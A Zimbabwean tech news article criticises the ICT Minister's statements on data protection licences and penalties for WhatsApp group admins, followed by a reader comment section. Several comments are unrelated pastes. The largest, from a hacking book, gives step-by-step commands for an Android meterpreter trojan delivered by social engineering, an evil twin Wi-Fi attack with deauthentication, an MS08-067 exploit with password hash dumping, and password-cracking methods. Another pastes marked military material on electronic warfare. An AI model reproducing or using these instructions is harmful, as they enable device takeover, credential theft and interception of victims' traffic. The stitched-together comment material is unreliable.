There’s never a shortage of drama in Zimbabwe and the latest involves the Minister of ICT, Tatenda Mavetera. She said something that affects the all-important WhatsApp and tempers flared across the country.
This is an excerpt of the quote the got the country’s blood boiling:
The time is ticking for organisations that collect first party data, as you are required by law to have a data protection licence and the license fees range from $50 to $2500…
…Even churches who collect personal data ought to have such a licence and appoint a DPO. Whatsapp group admins are not spared too, if your groups are meant for business, you should as well obtain a licence. Failure to comply attracts penalties.
As you would imagine, Zimbabweans did not like this one bit and there was plenty of commentary on it. The Minister then came back with some clarification:
False claim of USD 2500 penalties for WhatsApp Group Administrators
I would like distance myself from the malicious fake news of intentions by government to licence or penalise WhatsApp Groups or Administrators of any social media platform/s USD 2500.
This claim is not applicable especially to players who do not collect and process Personally Identifiable Information (PII) for commercial or business use.
Personally identifiable information (PII) is any type of data that can be used to identify someone, from their name and address to their phone number, passport information and I.d number.
The public is encouraged to disregard this notice with the uttermost discontent it deserves as it is inconsistent with our legal provisions as espoused in Statutory Instrument (SI) 155 of the 2024 Cyber and Data Protection (Licencing of Data controllers and Appointment of Data Protection Officers) Regulations.
On my LinkedIn post I never expressed any intentions to licence or penalise WhatsApp groups or Administrators of any social media platform/s which do not collect and process (Personally Identifiable Information (PII) for commercial or business use…
Where are you getting $2500?
Let’s be fair on this. I will assume that there were people who misunderstood the original post and assumed it meant there would be $2500 fines for using WhatsApp groups without a data protection licence.
The original post and a reading of the relevant Statutory Instrument said data protection licence fees ranged from $50-2500. We went through how much you should expect to pay for your bussiness-focused WhatsApp group here.
That’s not to say the penalty for not having the licence is $2500. It’s clear that this is where the confusion came from. The $2500 is the licence fee for data controllers that collect data for over 500,000 people.
No WhatsApp group is that big. Instead, most WhatsApp groups (for business use) will pay $50 for a group of less than 1000 people.
However, this doesn’t mean there won’t be penalties. In fact, Individuals or entities that process personal information without a data controller licence may face a fine up to level 11 or imprisonment for up to seven years, or both.
Chapter 3(3) of the Statutory Instrument 155 of 2024 says:
Any person who processes personal information in terms of this section without a data controller licence within the stipulated time frames shall be guilty of an offence and liable to a fine not exceeding level 11 or to imprisonment for a period not exceeding seven years or to both such fine and such imprisonment.
It’s just $1000 and 7 years in jail
A level 11 fine is up to $1000. So, we’re talking possibly being fined $1000 and spending 7 years in jail for running a 50-member WhatsApp group.
Yes, that includes WhatsApp group admins for groups of over 50 people. That’s because phone numbers are considered personal information. The Minister rightly says Personally Identifiable Information includes phone numbers and that’s why WhatsApp groups will be affected.
So, when the Minister says she is distancing herself from the statement that people are being charged $2500, she can honestly say that.
However, she should have gone on to explain that it’s just $1000 and 7 years imprisonment. I don’t see how that’s any better than the $2500 fine she is distancing herself from.
The Minister says she never expressed any intentions to licence or penalise WhatsApp groups or Administrators of any social media platform/s which do not collect and process (Personally Identifiable Information (PII) for commercial or business use.
However, the law she is standing on says they can or rather should be penalised. I don’t think you will be able to protest in court that the Minister said she never expressed intentions to licence or penalise you.
If the law applies, you will have no recourse, regardless of what the Minister says. The law is clear, WhatsApp admins should be punished. So rather than distance herself from obvious mistakes in the commentary, she should grapple with the meat of the SI in question.
It’s ridiculous and she should say that and maybe help get the ball rolling on getting the law amended.
Anyway, that’s what I think of the whole fiasco. Do chime in if you have thoughts on this.
Share
Home
25 comments
Personally, I think this law is overly harsh and unnecessary. As whatsApp group admins we shouldn’t face such severe penalties. We are quite aware that phone numbers are considered personal information. The Minister should reconsider this law and its implications on citizens’ freedom of expression and access to information.
I’m currently concerned with the imposed excessive penalties. Clearly $1000 and 7 years imprisonment is too much of a penalty for WhatsApp group admins. I mean, we just regular people doing regular business. This is restriction of freedom. I’m sure you can all attest that this law could potentially restrict citizens’ freedom of expression and access to information. It also affect small businesses and individuals like myself who are basically trying to earn a living.
I think it’s best if they reconsider the statutory instrument and its implications and engage citizens and stakeholders in discussions about data protection and privacy and also implement more reasonable penalties for data protection offenses.
When do IP addresses runout guys, we should be at 1Pv6 by now. Haven’t been tracking international tech news for a while, perhaps went global again.
The story is when the internet was created it was meant for military use. Sir Tom Berners Lee* then created HTML so ordinary people could use it.
The inherent flaw, not really a flaw but the thinking was not many devices would need it, then came the data explosion, then we started running out of IP addresses. The new ones look strange though but they won’t, fingers crossed run out, at least thats the thinking.
Regular IP: 5.185.145.139
IPv6: 5n.18a.bb8.3fd…or something like that, its confusing but necessary.
1) We have covered this here on Techzim.
2) We are not about to run out, we ran out.
3) Zimbabwe already uses IPv6. Liquid does although some ISPs just block it.
This will all be rendered moot when WhatsApp introduces user names. The solution in the mean time may be to switch groups over to telegram, since it already has usernames, and you can join a group without your number being known. It was a cute plan though.
For sale, Sparta, 7 Rooms plus kitchen and shower. $36,000 Neg.
5790 Unit J, Seke South, Chitungwiza
Come through, tinapangana.
Might I also add 7 years in a maximum security prison might not be that bad after all.I can only imagine the stories those inmates would share.Someof them were incarcerated but are innocent.The meals not for gratification but for sustinence.
The trading in cigarettes,the sculpting of chess pieces from sadza,the lack of vitamin D,the prison uniforms,the sketchy guards selling cellphones,the commissary,the snacks from visitors gold in the pen.
It’s really a different life in there and sampling it for 7 years might be too much but a year or two I’d survive.
I’ll follow you everywhere.
That law may not actually be waiting for ordinary groups but of a certain political party so as to tap into their conversations, get their numbers and names and addresses for easier access when the party wants to stage a rally, private meeting or demonstration. All other groups will not be affected.
Mark my post.
What’s happening to the world, here we have Vene and his crew, on the other side of the planet there is Trump and his crew, then there is Putin trying to convince everyone he’s still got game, while the Chinese quietly takeover of the world. It feels like silly season came back with a vengeance.
This is all unnecessary and unprofessional, what if you are just a teenager try to start a small business??. This will drive more citizens out of the country.
We have to deak with a gvt focused on censorship and micromanaging breadcrumbs. Any smart minister would have figured out how dumb the idea of managing whatsapp groups and taxing them is. Regardless of it being the law, it exposes the level of a person’s smarts and where some lights are dim or rarely turn on. Mavetera’s high-school kind of argument betrays her wits, if any she had. And it made me think under the present gvt which female minister has ever exhibited something plausible, that would have her set apart from the mediocrity that we are seeing today
asadmal051@gmail.com
Vineyard WhatsApp Group🍇
I have just seen an aeroplane going full throttle over Sparta ^, unmarked underbelly, heading South East.
I don’t know of many routes going South East, if it continues in that direction it will get to Maputo, not OR Tambo.
Air Zimbabwe, brace yourself! We need an expansion into regional routes linked to the African Free Trade Area, the closer ones first.
For planes I know you guys can come up with something even if they call them bhero oro lease or hire purchase.
I cannot get my head around that there is no direct flight to Maputo…
Maputo🇲🇿
Kinshasha🇨🇩
Lilongwe🇲🇼
Luanda🇦🇴
Lusaka🇿🇲
Air Zimbabwe Regional Jet 🚀🇿🇼
50 and 200 seaters mixed?
Embraer
Bombadier
…..? —-> +-14 years Local Variant.
Adapt and move on. If Whatapp does not fit your needs consider another platform that does meet your needs. Whatsapp with usernames????
Exploiting a Mobile Device Remotely
Kali Linux, a known toolkit for exploiting computers, is also one of the most efficient tools to perform a
hack on a mobile device. Follow these steps to perform a remote hack on a mobile device and install a
malicious file on a targeted device.
1. Pull up Kali Linux
Type the following command:
msfpayload android/meterpreter/reverse_tcp LHOST=[your device’s IP address] R >
/root/Upgrader.apk
2. Pull up a new terminal
While Kali is creating your file, load another terminal and load the metasploit console. To do that,
enter the command:
Msfconsole
3. Set up the listener
Once metasploit is up, load the multi-handler exploit by entering the command:
use exploit/multi/handler
Afterward, create the reverse payload by typing the following command:
set payload android/meterpreter/reverse_tcp
Next, you will need to set up the L host type in order for you to start receiving traffic. To do that,
type the following command:
set LHOST [Your device’s IP address]
4. Start the exploit
Now that you have your listener ready, you can now start your exploit by activating your listener.
To do this, type the command:
Exploit
If the malicious file or Trojan that you have created a while ago is ready, copy it from the root
folder to your mobile device, preferably an android phone. Afterwards, make that file available by
uploading it on any file-sharing site such as speedyshare or Dropbox. Send the link to your target,
and ask him to install the app.
Once your target user has installed the file, you can now receive the traffic that he is receiving
through his mobile device!
Social Engineering as Art and Science
The logic behind social engineering is simple – it can be easy to get all the information and access that one
needs from any person as long as you know how to trick a person into giving you the data you need with
the least resistance possible. By being able to pull off a social engineering trick, you will be able to get your
hands on to a device, account, or application that you need to access in order to perform bigger hacks or
hijack an identity altogether. That means that if you are capable of pulling of a social engineering tactic
before attempting to go through all other hijacking tactics up your sleeve, you do not need to make
additional effort to penetrate a system. To put this entire concept into simpler terms, social engineering is
a form of hacking that deals with manipulation of victims through social interaction, instead of having to
break right away into a computer system.
What makes social engineering difficult is that it is largely based on being able to secure trust, which is only
possible by getting someone’s trust. For this reason, the most successful hackers are capable of reading
possible responses from a person whenever they are triggered to perform any action in relation to their
security system. Once you are able to make the right predictions, you will be able to get passwords and
other valuable computer assets without having to use too many tools.
Since social engineering is mostly about psychology, you can consider this tactic as both an art and a
science. This tactic involves a great deal of creativity and ability to decipher nonverbal language of a device
or account owner. Social engineering experts are able to compile tactics that seem to work against
computer users all the time.
Together with other types of hacks available, you will realize that social engineering is that part of the most
successful attacks, and that attacks mostly work because of some form of mental trickery performed by a
hacker. Social engineering makes it possible for a person to simply log in personal information on any form
he sees, or freely open an attachment that has embedded malware.
Because social engineering’s goal is to dupe someone into providing information that will allow access to a
more valuable data, this hacking tactic will allow you to get mostly anything from a targeted system. What
makes it a good tactic is that you can phish for a gateway to the information that you want to hack from
mostly anyone that has access to the system that you are targeting, from receptionists to IT personnel,
with these steps:
1. Research
2. Creation of trust
3. Exploitation of relationship by communicating with targeted individual
4. Using information leaked for malicious gain
The art and science behind social engineering are created because of a single truth about information
security – security ends and begins with a user’s knowledge on how a system should be protected. No
matter how updated your security system is, you will never be able to protect your network and your devices if there is a user on your end that is not capable of keeping vital information from potential
attackers. With this thought comes the idea that once a social engineer becomes more aware of who
should be targeted within the organization for critical information.
How Social Engineering Happens
If you are going to think like a social engineer, you will get the idea that the most vulnerable people within
any organization are those that are very likely to give away information with the least possible resistance.
With that thought, you can easily zero in on receptionists, call center agents, and others that are trained to
divulge information to anyone who asks for them. It’s safe to assume that next in line are end users who
are naïve enough to think that they can provide personal information to those who pretend to be technical
support personnel, supervisors, or people who can provide them a reward for merely answering a question
that may leak out the answer to a privacy question.
Since social engineering highly rests on the behavior of users towards information security, people who are
most susceptible to attacks are the following:
1. People who divulge too much information about their personal lives
2. People who create passwords using their own names, birthdays, or pet’s name
3. People who divulge information about the devices that they are using
4. People who use the same passwords for almost every account
5. People who do not physically secure their own devices, or any documents that may point out
details about information security protocols
As long as you can gain access to these types of people, then you can easily pry on any information that
you want to gain without having to spend too much effort. By being able to locate these types of users in
any organization, you will be able to get as much valuable data as you can as if you have had access to all
targeted devices.
The Evil Twin Hack
While many beginning hackers are excited to hack Wi-Fi passwords to enjoy free bandwidth, there are
network connection hacks that are more powerful and provide better access than a free internet
connection. Among these hacks is the evil twin access point hack.
The evil twin AP is a manipulative access point that appears and behaves like a usual access point that a
user connects to in order to connect to the internet. However, it is usually used by hackers to make
targeted victims to their access point. This allows a hacker to see all the traffic that comes from the client,
which gives way to a very dangerous man-in-the-middle attack.
Follow the steps to do an evil twin access point attack:
1. Fire up Backtrack and start airmon-ng.
Check if the wireless card is running by entering the command:
bt > iwconfig
2. Put the wireless card into monitor mode
Once you see that the wireless card is recognized by Backtrack, place it on monitor or promiscuous
mode by entering the command:
bt >airmon-ng start wlan0
3. Fire up airdump-ng
Start capturing all the wireless traffic that the wireless card can detect by entering the command:
bt > airodump-ng mon0
After doing that, you will be able to see all the access points within range. Locate the access point
of your target
4. Wait for the target to connect
Once the target connects to the access point, copy the BSSID and the MAC address of the system
you want to hack.
5. Create an access point with the same
credentials
Pull up a new terminal and type this command:
bt > airbase-ng -a [BSSID] –essid [“SSID of target”] -c [channel number] mon0
This will create the access point, or the evil twin, that you want your target to connect to.
6. Deauthenticate the target
In order for him to connect to the evil twin access point, you need to bump the target off the
access point that he is connected to. Since most wireless connections adhere to the 802.11 which
has deauthentication protocol, his access point will deauthenticate everyone that is connected to
it. When the target’s computer tries to reconnect to the internet, he will automatically connect to
the AP with the strongest signal, which is the evil twin access point that you have just created.
In order to do that, you need to make use of the following command:
bt > aireplay-ng –deauth 0 -a [BSSID of target]
7. Turn up the signal of the evil twin
Now, here is the crucial part – you need to make sure that the fake access point’s signal that you
have just created is as strong as or stronger than the original access point. Since you are attacking
from a distance, you can almost deduce that his own WiFi connection has much stronger signal
than yours. However, you can use the following command to turn up the signal:
iwconfig wlan0 txpower 27
Entering this command will boost your access point’s power by 500 milliwatts, or 27 dBm.
However, take note that depending on your distance from the target, 500 milliwatts may not be
enough for him to stay connected to the evil twin. However, if you have a newer wireless card, you
can boost the access point’s signal up to 2000 milliwatts, or four times what is legal in the US.
8. Change your channel
This step comes with a warning: it is illegal to switch channels in the US, and before you proceed,
see to it that you have special permission as an ethical hacker.
There are certain countries that allow better Wi-Fi power, which can aid you in maintaining the
signal strength of your evil twin access point. For example, Bolivia allows its internet users to
access the Wi-Fi channel 12, which comes with a full power of 1000 milliwatts. To change the
signal channel of your wireless card to match Bolivia’s, enter the following command:
iw reg set BO
Since your channel will now allow you to increase the power of your access point, you can further
increase the signal of your evil twin by entering the command:
iwconfig wlan0 txpower 30
Now, check the power of the evil twin’s access point by typing iwconfig.
Other Ways to Uncover Passwords
As mentioned earlier, the easiest way to crack a password is to have physical access to the system that you
are trying to hack. If you are not able to make use of cracking tools on a system, you can use the following
techniques instead:
1. Keystroke logging
This is easily one of the most efficient techniques in password cracking, since it makes use of a
recording device that captures keystrokes as they are typed in a keyboard. You can use of a
keyboard logging software, such as the KeyLogger Stealth and the Spector Pro, or a keylogging
hardware such as the KeyGhost.
2. Searching for weak password storages
There are too many applications in most computers that store passwords locally, which make
them very vulnerable to hacking. Once you have physical access to a computer, you can easily find
out passwords by simply searching for storage vulnerabilities or making use of text searches. If you
are lucky enough, you can even find stored passwords on the application itself.
3. Weak BIOS Passwords
Many computers allow users to make use of power on passwords in order to protect hardware
settings that are located in their CMOS chips. However, you can easily reset these passwords by
simply changing a single jumper on the motherboard or unplugging the CMOS battery from the
board. You can also try your luck and search online for default user log in credentials for different
types of motherboards online.
4. Grab passwords remotely
If physical access to the system or its location is impossible, you can still grab locally stored
passwords on a system running on a Windows OS from remote location and even grab the
credentials of the system administrator account. You can do this by doing a spoofing attack first,
and then exploiting the SAM file on the registry file of the targeted computer by following these
steps:
1. Pull up Metasploit and type the following command: msf > use
exploit/windows/smb/ms08_067_netapi
2. Next, enter the following command: msf (ms08_067_netapi) > set payload
/windows/meterpreter/reverse_tcp
After doing so, Metaploit will show you that you need to have the target’s IP address (RHOST) and the IP address of the device that you are using (LHOST). If you have those
details already, you can use the following commands to set the IP addresses for the
exploit:
msf (ms08_067_netapi) > set RHOST [target IP address]
msf (ms08_067_netapi) > set LHOST [your IP address]
3. Now, do the exploit by typing the following command:
msf (ms08_067_netapi) > exploit
This will give you a terminal prompt that will allow you to access the target’s computer
remotely.
4. Grab the password hash
Since most operating systems and applications tend to store passwords in hashed for
encryption purposes, you may not be able to see the user credentials that you are after
right away. However, you can get these hashes and interpret them later. To grab the
hashes, use this command:
meterpreter > hashdump
After entering this, you will see all the users on the system you are hacking, and the hashed
passwords. You can then attempt to decrypt these hashes using tools such as Cain & Abel.
How to Crack Passwords
If it is not possible for a hacker to know a user’s password through inference, social engineering, and
physical attack (to be discussed in detail in later chapters), he can instead use several password cracking
tools, such as the following:
1. Cain & Abel – used to crack NT and LM (NTLM) LanManager hashes, Pic and Cisco IOS hashes,
Radius hashes, and Windows RDP passwords.
2. Elmcomsoft Distributed Password Recovery – cracks PKCS, Microsoft Office, and PGP
passwords. It can also be used in cracking distributed passwords and recover 10,000
networked computers. It also makes use of GPU accelerator which can increase its cracking
speed up to 50 times.
3. Elcomsoft System Recovery – resets Windows passwords, resets all password expirations, and
sets administrative credentials.
4. John the Ripper – cracks Windows, Unix, and Linux hashed passwords
5. Ophcrack – makes use of rainbow tables to crack Windows passwords
6. Pandora – cracks offline or online user passwords for Novell Netware accounts
7. Proactive System Password Recovery – recovers any password stored locally on a Windows
operating system. This includes passwords for logins, VPN, RAS, SYSKEY, and even WEP or WPA
connections.
8. RainbowCrack – cracks MD5 and LanManager hashes using the rainbow table.
Take note that some of these tools may require having physical access to the system that you want to
hack. On the same vein, keep in mind that once a hacker has physical access to a system that you intend to
protect, he would be able to dig into all password-protected or encrypted file that you have, as long as he
has the right tools.
When testing out tactics for cracking passwords, one of the most important things that you need to
remember is that the technique that you need to test will be based on the type of encryption of the
password that you need to crack. Also, if you are testing out password-cracking hacks, you may also need
to remember that it is possible for certain systems to lock out associated users, which may cause denial of
service to users who are using the network.
Chapter 5: Hacking Tools
Both ethical and criminal hackers have access to abundance of hacking tools that can be used to either
attack or protect a particular system. These tools can be crowd-sourced from the internet through forums
and other online hubs dedicated to hackers.
As a beginning ethical hacker, it is very important that you learn the most commonly used tools to detect
possible vulnerabilities, conduct tests, and administer actual hacks. Here are 8 of the most popular tools
used by hackers today:
1. Angry IP Scanner (ipscan)
Most popularly called as ipscan by seasoned hackers, this tool is used to track computers through
their IP addresses and also to snoop for ports to check for gateways that will lead them straight
into a targeted computer system. This tool is also commonly used by system engineers and
administrators to check for possible vulnerabilities in systems that they are servicing.
This tool is open source and can be used across platforms, and is lauded for being one of the most
efficient tools for hacking that is available on the market.
2. Kali Linux
Launched in 2015, this application is one of the favorites of hackers because of the abundance of
features. This security-centered toolkit allows you to run it right from a CD or through a USB,
without need for any installation.
This toolkit contains most of the interfaces that you need for hacking, which includes creation of
fake networks, spoof messages, and even crack WiFi passwords.
3. Cain & Abel
Cain & Abel is one of the most efficient hacking toolkits that work well against Microsoft operating
systems. This tool allows you to recover wireless network passwords, user account passwords, and
use a few brute force methods when it comes to cracking passwords. You can also use it to record
VoIP conversation sessions.
4. Burp Suite
Burp Suite is one of the most essential tools that you can use when you want to map out
vulnerabilities on a website. This tool allows you to examine every cookie that resides on a
website, and also start connections within website applications.
5. Ettercap
This tool is efficient when it comes to launching man in the middle attacks, which is designed to
make two different systems believe that they are communicating with each other, but a hacker is
secretly relaying a different message to the other. This tool is efficient in manipulating or stealing
transactions or transfer of data between systems, or to eavesdrop on a conversation.
6. John the Ripper
This is one of the best brute force password crackers which use the dictionary attack. While most
hackers may think that brute force tactics involve too much time to crack a password, John the
Ripper is known to be one of the more efficient tools when it comes to recovering encrypted
passwords.
7. Metasploit
Metaspoit is widely acclaimed among hackers because it is an efficient tool when it comes to
identifying possible security issues and also to verify mitigations of system vulnerabilities. It also is
one of the best cryptography tools for hackers since it is also efficient when it comes to masking
identities and locations of an attack.
8. Wireshark and Aircraft-ng
These tools are used together to detect wireless connections and hack user IDs and passwords on
a WiFi connection. Wireshark serves as a packet sniffer, and Aircraft-ng serves as the packet
capturing suite that will also allow you to use a variety of other tools to monitor WiFi security.
Now that you have a list of tools that you can use to practice hacking and to also discover vulnerabilities in
your own system, you can now dig deeper right into the most common hacking tactics….
Doing System Scans
Once you know how you can actively gather information about your network, you will have an idea on how
criminal hackers would possibly launch an attack against your network. Here are some of the things that
you can do to see how vulnerable your system is:
1. Use the data you found on your Whois searches to see how related hostnames and IP addresses can be
laid out. For example, you can verify information on how some internal hostnames, operating protocols,
running services, open ports, and applications are displayed on a web search, which may give you an idea
on how criminal hackers may soon infiltrate your system.
2. Scan your internal hosts and know what possibly rogue users may access. Keep in mind that an attacker
may come from within your organization and set up shop in one of your hosts, which can be very difficult
to point out.
3. Check your system’s ping utility, or use a third-party utility that enables you to ping different addresses
simultaneously. You can do this by using tools such as NetScan Tools, fping (if you are using Unix), or
SuperScan. If you are not aware of what your gateway IP address is, you can search for your public IP
address by going to http://www.whatismyip.com.
4. Do an outside-in scan of your system by scanning for open ports. To do that, you can use tools such as
Nmap or Superscan, and then check what others can see on your network traffic by using tools such as
Wireshark or Omnipeek.
By doing this scan, you can get an idea on what other people can see when they scan your public IP address
and then connect a workstation right into a hub or switch on your router’s public side.
Once you are able to scan open ports, you will be able to realize that outsiders who are doing sweeps on
your open ports can easily find the following information:
VPN services that you are running, such as IPSec, PPTP, and SSL
Services that are running on your ports, such as email, database apps, and web servers
Authentication requirement for sharing across netwoks
Remote access services available on your system, such as Remote Desktop, Secure Shell, VNC, and
Windows Terminal Services.
3. Denial of Service (DoS) and Distributed Denial of Service (DDoS)
A DoS attack is defined as the denial of access or service to a legitimate user – you can see that all
services that are running on your computer are slowing down or quit suddenly as you use them. A
DDoS attack, on the other hand, involves a larger number of systems that have been previously
compromised by a hacker to attack a particular target.
While DoS and DDoS attacks are not used to destroy a target’s security system or to steal data, it
can be used to generate profit loss or to render a computer system entirely useless while it is being
used. Usually, these attacks are made to create a temporary loss in connectivity on a network and
deny all related services. In certain occasions, these attacks can also work to destroy certain files and programs on a targeted computer.
A DoS or a DDoS attack is very similar to having a slow internet connection and a slow computer at
the same time. During such an attack, you may feel that your network’s performance is unusually
slow and you cannot access any website. At the same time, it is also relatively easy to find out if
you are being targeted for an attack – you may see that you are receiving too much spam or other
signs of unusual traffic.
Now that you have an idea on the types of attacks that a hacker may launch, it’s time for you to learn how
a hacker can launch them and prepare yourself to do countermeasures.
Denial of Service attack –This attack can be done when the ARP
spoofing is done to link several multiple IP addresses to a targeted device’s MAC address. What
happens in this type of attack is that all the data that is supposedly sent to other IP addresses are
instead redirected to a single device, which can result in a data overload.
I hope you can make your systems more secure with this information, every organisation, agency and battalion needs to view hacking very seriously, the very best hackers were never there.
(U//FOUO) Cyber vs EW
(U//FOUO) Cyber is an emerging capability for
combat commanders and currently come with added
restrictions due to the nature of that capability.
Commanders should be aware that similar effects
can be achieved with EW as with cyber if properly
articulated during the planning and orders
production process. Commanders should become
familiar with these concepts and plan with respect to
their effects in the battle space instead of what
assets are used
(U) Cyber-attacks can effectively shape the
battlefield and require very little risk on the part of the
perpetrator.
(U) Because of manuva warfare’s reliance on communication, Russia has invested heavily in
Electronic Warfare systems which are capable of shutting down communications and signals across a broad spectrum. This capability is grouped under the concept of the Radio Electronic Battery (REB). The
REB’s objective is to degrade or deny that vital capability to tactical and operational commanders. The
Russians do not have a one size fits all approach, but rather possess a suite of platforms, each designed
to counter an adversaries communications capability.
The Russians layer these systems to shut down FM,
SATCOM, cellular, GPS, and other signals. In Eastern Ukraine, these EW systems have proved devastating
to Ukrainian radio communications, are capable of jamming unmanned aircraft systems (UAS), and can
broadcast false GPS signals (an effect called spoofing).
(U) ELECTRONIC WARFARE
(U//FOUO) The key cornerstone of U.S. and NATO methodology is maneuver (manuva) warfare. Maneuver warfare depends on communication and synchronization of assets. The U.S. has communication infrastructure down to the four man Infantry Fire Team level and the ability to battle track those formations with almost real-time speed.
SPR-2 (RTUT)
PRIMARY PURPOSE: Counter Artillery/Defeat
Radio Proximity Fuse Munitions
COVERAGE AREA: 50 hectares
INTO/OUT OF ACTION: Not more than 4 min
CREW REQUIREMENTS: 2 PAX
R330 SERIES
PRIMARY PURPOSE: Electronic Jamming/DF
SEARCH COVERAGE: 360 Degrees
DF ERROR: Not more than 3 degrees
EFFECTIVE SIGNALS: AM, FM, CW, SSB, ISB, FSK, PSK, PFT
CREW: 4 PAX
SETUP/TAKEDOWN: 20/15 minutes
RP-377 L/LA
PRIMARY PURPOSE: Direction Finding/Monitoring
FREQUENCY RANGE: 20-2000 Detection/25-2000
Direction Finding
DIRECTION OF ERROR: Not more than 3 degrees
INTO/OUT OF ACTION: Not more than 20 min/10
min
CREW: 2-3 PAX
Hannibal from Tunisia went to war with Elephants, Bees, Snakes and a mixed race army, very unconventional at the time, but he was effective until the last moment, not sure what happened but he left Rome unsacked. Off course he was to pay for this, there is a video game about this, Rome Total War. I played the previous Total War version, Napoleon. Immerse game, very tactical.
One of my versions of artillery fire. Mamba cocktail, large clay pot, live black mambas on an air cushion of something to break the fall. Then you write a little note inside. Then your hurl 100 pissed Black Mambas into an enemy camp at night. Crash, the clay pot breaks! Ma1 atanga, just listen to the pandemonium, take a video for posterity.
The minister should not be the one ahead of this, it should be Potraz. They are the ones dealing with implementation, monitoring and compliance. According to them they will not be focusing on social media. It has been asked and they said so. Now it looks like they are keeping quiet to save face for the minister who keeps talking out the side of her neck. She spoke on a issue she was not well versed with. Instead of making high level comment she went into specifics which I doubt she knows much about and it shows.